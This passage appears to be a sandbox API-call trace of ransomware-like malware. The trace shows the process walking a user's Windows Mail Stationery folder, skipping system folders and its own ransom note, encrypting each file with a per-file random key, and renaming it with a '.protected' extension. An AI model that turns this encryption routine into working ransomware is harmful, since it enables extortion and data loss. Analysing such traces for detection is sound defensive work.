pbBuffer=0x295e76c) returned 1 [0085.460] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.461] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.462] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg") returned 91 [0085.462] StrStrW (lpFirst="Bears.jpg", lpSrch=".txt") returned 0x0 [0085.462] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg") returned 91 [0085.462] StrStrW (lpFirst="Bears.jpg", lpSrch=".rar") returned 0x0 [0085.462] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg") returned 91 [0085.462] StrStrW (lpFirst="Bears.jpg", lpSrch=".zip") returned 0x0 [0085.462] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x432, lpOverlapped=0x0) returned 1 [0085.480] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffbce, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.480] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x432, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x432, lpOverlapped=0x0) returned 1 [0085.480] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.481] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.481] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.481] CloseHandle (hObject=0x150) returned 1 [0085.481] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.protected") returned 101 [0085.481] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg.protected")) returned 1 [0085.482] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.482] lstrcmpiW (lpString1="Desktop.ini", lpString2="Windows") returned -1 [0085.482] lstrcmpiW (lpString1="Desktop.ini", lpString2="Program Files") returned -1 [0085.482] lstrcmpiW (lpString1="Desktop.ini", lpString2="Program Files (x86)") returned -1 [0085.483] lstrcmpiW (lpString1="Desktop.ini", lpString2="$Recycle.bin") returned 1 [0085.483] lstrcmpiW (lpString1="Desktop.ini", lpString2="System Volume Information") returned -1 [0085.483] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini") returned 93 [0085.483] StrStrIW (lpFirst="Desktop.ini", lpSrch=".protected") returned 0x0 [0085.483] lstrcmpW (lpString1="Desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0085.483] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.483] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.483] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.483] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini") returned 93 [0085.483] StrStrW (lpFirst="Desktop.ini", lpSrch=".txt") returned 0x0 [0085.483] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini") returned 93 [0085.483] StrStrW (lpFirst="Desktop.ini", lpSrch=".rar") returned 0x0 [0085.483] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini") returned 93 [0085.483] StrStrW (lpFirst="Desktop.ini", lpSrch=".zip") returned 0x0 [0085.484] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x285, lpOverlapped=0x0) returned 1 [0085.484] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffd7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.484] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x285, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x285, lpOverlapped=0x0) returned 1 [0085.485] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.485] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.485] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.485] CloseHandle (hObject=0x150) returned 1 [0085.486] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini.protected") returned 103 [0085.486] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\desktop.ini.protected")) returned 1 [0085.487] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.487] lstrcmpiW (lpString1="Garden.htm", lpString2="Windows") returned -1 [0085.487] lstrcmpiW (lpString1="Garden.htm", lpString2="Program Files") returned -1 [0085.487] lstrcmpiW (lpString1="Garden.htm", lpString2="Program Files (x86)") returned -1 [0085.488] lstrcmpiW (lpString1="Garden.htm", lpString2="$Recycle.bin") returned 1 [0085.488] lstrcmpiW (lpString1="Garden.htm", lpString2="System Volume Information") returned -1 [0085.488] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm") returned 92 [0085.488] StrStrIW (lpFirst="Garden.htm", lpSrch=".protected") returned 0x0 [0085.488] lstrcmpW (lpString1="Garden.htm", lpString2="RESTORE_FILES.txt") returned -1 [0085.488] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.488] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.488] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.488] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm") returned 92 [0085.488] StrStrW (lpFirst="Garden.htm", lpSrch=".txt") returned 0x0 [0085.488] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm") returned 92 [0085.488] StrStrW (lpFirst="Garden.htm", lpSrch=".rar") returned 0x0 [0085.489] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm") returned 92 [0085.489] StrStrW (lpFirst="Garden.htm", lpSrch=".zip") returned 0x0 [0085.489] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0xe7, lpOverlapped=0x0) returned 1 [0085.490] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff19, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.490] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xe7, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0xe7, lpOverlapped=0x0) returned 1 [0085.491] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.491] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.491] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.491] CloseHandle (hObject=0x150) returned 1 [0085.492] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm.protected") returned 102 [0085.492] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm.protected")) returned 1 [0085.493] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.493] lstrcmpiW (lpString1="Garden.jpg", lpString2="Windows") returned -1 [0085.493] lstrcmpiW (lpString1="Garden.jpg", lpString2="Program Files") returned -1 [0085.493] lstrcmpiW (lpString1="Garden.jpg", lpString2="Program Files (x86)") returned -1 [0085.493] lstrcmpiW (lpString1="Garden.jpg", lpString2="$Recycle.bin") returned 1 [0085.493] lstrcmpiW (lpString1="Garden.jpg", lpString2="System Volume Information") returned -1 [0085.493] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg") returned 92 [0085.493] StrStrIW (lpFirst="Garden.jpg", lpSrch=".protected") returned 0x0 [0085.493] lstrcmpW (lpString1="Garden.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0085.493] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.493] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.493] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.494] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg") returned 92 [0085.494] StrStrW (lpFirst="Garden.jpg", lpSrch=".txt") returned 0x0 [0085.494] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg") returned 92 [0085.494] StrStrW (lpFirst="Garden.jpg", lpSrch=".rar") returned 0x0 [0085.494] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg") returned 92 [0085.494] StrStrW (lpFirst="Garden.jpg", lpSrch=".zip") returned 0x0 [0085.494] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0085.502] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.502] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0085.503] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.503] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.527] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.527] CloseHandle (hObject=0x150) returned 1 [0085.528] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.protected") returned 102 [0085.528] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg.protected")) returned 1 [0085.528] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.528] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="Windows") returned -1 [0085.529] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="Program Files") returned -1 [0085.529] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="Program Files (x86)") returned -1 [0085.529] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="$Recycle.bin") returned 1 [0085.529] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="System Volume Information") returned -1 [0085.529] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm") returned 99 [0085.529] StrStrIW (lpFirst="Green Bubbles.htm", lpSrch=".protected") returned 0x0 [0085.529] lstrcmpW (lpString1="Green Bubbles.htm", lpString2="RESTORE_FILES.txt") returned -1 [0085.529] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.529] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.529] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.529] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm") returned 99 [0085.529] StrStrW (lpFirst="Green Bubbles.htm", lpSrch=".txt") returned 0x0 [0085.529] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm") returned 99 [0085.529] StrStrW (lpFirst="Green Bubbles.htm", lpSrch=".rar") returned 0x0 [0085.529] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm") returned 99 [0085.529] StrStrW (lpFirst="Green Bubbles.htm", lpSrch=".zip") returned 0x0 [0085.529] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0xed, lpOverlapped=0x0) returned 1 [0085.530] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff13, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.530] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0xed, lpOverlapped=0x0) returned 1 [0085.536] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.536] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.536] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.536] CloseHandle (hObject=0x150) returned 1 [0085.537] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm.protected") returned 109 [0085.537] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm.protected")) returned 1 [0085.537] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.537] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="Windows") returned -1 [0085.537] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="Program Files") returned -1 [0085.537] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="Program Files (x86)") returned -1 [0085.537] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="$Recycle.bin") returned 1 [0085.537] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="System Volume Information") returned -1 [0085.537] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg") returned 98 [0085.537] StrStrIW (lpFirst="GreenBubbles.jpg", lpSrch=".protected") returned 0x0 [0085.537] lstrcmpW (lpString1="GreenBubbles.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0085.537] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.538] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.538] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.538] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg") returned 98 [0085.538] StrStrW (lpFirst="GreenBubbles.jpg", lpSrch=".txt") returned 0x0 [0085.538] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg") returned 98 [0085.538] StrStrW (lpFirst="GreenBubbles.jpg", lpSrch=".rar") returned 0x0 [0085.538] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg") returned 98 [0085.538] StrStrW (lpFirst="GreenBubbles.jpg", lpSrch=".zip") returned 0x0 [0085.538] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x1906, lpOverlapped=0x0) returned 1 [0085.541] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffe6fa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.541] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1906, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x1906, lpOverlapped=0x0) returned 1 [0085.544] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.544] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.545] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.545] CloseHandle (hObject=0x150) returned 1 